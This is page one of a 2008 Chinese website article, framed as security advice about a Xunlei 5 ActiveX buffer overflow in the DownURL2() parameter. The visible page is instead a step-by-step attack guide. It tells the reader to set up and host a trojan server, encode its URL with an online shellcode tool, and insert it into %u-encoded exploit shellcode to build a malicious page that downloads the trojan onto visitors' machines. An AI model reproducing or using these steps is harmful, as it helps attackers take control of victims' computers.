您的位置:学习中国 攻防天地 病毒防治 正文
原作者:diannao 添加时间:2008-11-26 原文发表:2008-11-26 人气:223 来源:www

本文章共1280字,分2页,当前第1页,快速翻页:
 
-----------------------------------------------------------------------------------------------------------------------------------------------

本文提示:《迅雷有漏洞怎么办》是本站编辑们为广大网友精选的实用文章,本文阐述了关于文章的相关理论,相对来说专业性强,但是本文只是针对于某个问题提出的见解与论述,未必能辐射到相关问题的方方面面,所以本文处理问题的方法仅仅为您提供一些参考。更多问题请查阅学习中国网其他栏目哦.

-----------------------------------------------------------------------------------------------------------------------------------------------

 昨天我到妹妹家玩,看到她在用迅雷5下载电影,不由得惊出一身冷汗。因为迅雷5最近爆出了一个高危漏洞,黑客利用它可以实现远程溢出,控制受害者的电脑,使其成为黑客的“肉鸡”。什么?你没有听说过这个漏洞?那就快看看本文,早点做好安全防护。

 

迅雷5 ActiveX控件可实现远程溢出
  Web迅雷的高危漏洞才爆出没有多久,最近Web迅雷的老大哥,迅雷5也出现了一个高危的漏洞。经过测试发现,迅雷 5.6.9.344版本的ActiveX控件上存在多个缓冲区溢出漏洞,远程攻击者可以利用此漏洞控制用户系统。
  经过我的试验,迅雷5中的DPClient.Vod.1 ActiveX控件文件,在处理传送给DownURL2()的参数的时候会造成数据溢出。这样如果用户受骗访问了恶意网页的话,就可能触发软件缓冲区溢出,会让远程攻击者执行任意指令。
恶意代码“攻陷” 迅雷5
  第一步:首先配置一个木马的服务端程序,然后将它上传到自己的网络空间中,这样就得到了木马地址。现在我们对这个木马地址进行加密处理。在搜索引擎里面搜索“网页加密”,接着在搜索到的加密网站里面,比如http://www.cha88.cn/safe/shellcode.Php,输入木马地址后点击“Ascii→Unicode”即可。

  第二步:现在配置迅雷漏洞的利用网页。由于没有现成的漏洞生成工具,因此只有修改网络中现成的漏洞代码。在源代码中有如下的一句信息:“%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000”,现在只需要将加密后的网页木马地址,复制到代码里面指定的位置就可以了。
 

本文章更多内容1 - 2 - 下一页>>
本页地址
相关文章

恶意网站如何攻击
必须要看的AV终结者病毒专题
专杀AV终结者病毒
无需工具:手工查杀木马和病毒
查杀被恶意种植的木马病毒
新欢乐时光VBS/Redolf的清除办法
I-WORM/Badtrans.b,病毒的清除
手工清除“恶邮差”(Supnot)蠕虫病毒
清除无法显示 隐藏文件的病毒
灭毒有招全面清除计算机病毒
中隐身僵尸木马怎么办
如何清楚下载软件中的木马
如何清除KL木马
如何清除Trojan.Small.dxt病毒
如何清除AV终结者
什么是Speech API漏洞
电脑中了zpx520病毒怎么办
快速清除刻录盘上病毒的方法

相关评论


本文章所属分类:首页 攻防天地 病毒防治   病毒防治